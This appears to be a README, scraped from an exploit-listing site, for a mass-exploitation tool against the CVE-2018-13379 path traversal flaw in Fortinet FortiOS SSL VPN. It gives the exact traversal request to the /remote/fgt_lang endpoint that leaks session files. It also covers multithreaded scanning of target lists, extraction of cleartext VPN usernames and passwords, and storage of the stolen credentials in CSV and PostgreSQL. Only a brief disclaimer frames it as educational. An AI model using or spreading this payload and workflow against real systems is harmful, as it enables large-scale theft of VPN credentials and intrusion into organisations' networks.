## https://sploitus.com/exploit?id=1BD01929-4022-5FDD-91DB-F38A3D59355B

# CVE-2018-13379 โ Mass Exploit for Fortinet FortiOS SSL VPN
A tool for mass exploitation of the CVE-2018-13379 (path traversal) vulnerability in Fortinet FortiOS SSL VPN. Allows reading session files and extracting logins and passwords in cleartext.
## Features
- Exploitation of CVE-2018-13379 via the `/remote/fgt_lang` endpoint
- Multithreading (20 threads by default)
- Instant saving of found credentials to CSV and PostgreSQL
- Dynamic table names in PostgreSQL with a timestamp (`fortios_creds_20250120_143052`)
- No warnings - just the results
## Installation
```bash
git clone https://github.com/yourusername/cve-2018-13379-mass.git
cd cve-2018-13379-mass
pip3 install requests psycopg2-binary
```
## Configuration
All settings are editable directly in the script - no fiddling with command line arguments lines:
```python
TARGETS_FILE = "targets.txt" # File with targets (ip:port)
CSV_FILE = "fortios_creds.csv" # Output CSV file
```
## PostgreSQL (optional - the script works without a database)
```
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8
```
## Usage
1. Create a file `targets.txt` with targets, one per line:
```text
192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
```
2. Run the script:
```bash
python3 exploit.py
```
## Results
- **CSV file** โ all found credentials with timestamps
- **PostgreSQL table** โ a new table is created on each run (`fortios_creds_YYYYMMDD_HHMMSS`)
Example output:
```text
[+] 100 targets loaded. We're running in 20 threads...
[+] LEAKED: 192.168.1.1:8443
โ Pulled 3 credentials
Wrote 3 credentials to CSV
3 credentials entered into the DB
[-] Not leaky: 10.0.0.1:10443
```
## How it works
1. A GET request is sent to the address `https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websession`
2. The response is checked to see if it contains the string `var fgt_lang` (a sign of vulnerability)
3. The `username` and `password` pairs are extracted from the binary response
4. The found data is immediately saved to CSV and PostgreSQL
5. Script moves to the next target.
## Requirements
- Python 3.6+
- `requests`
- `psycopg2-binary` (optional - only CSV files work without it)
- `urllib3`
## Warning
This tool is intended for educational purposes and authorized testing. You are responsible for your own actions.
## Acknowledgments
- Original vulnerability discovered by Meh Chang
- Exploitation logic is based on publicly available research
## License
Unlicense - do whatever you want.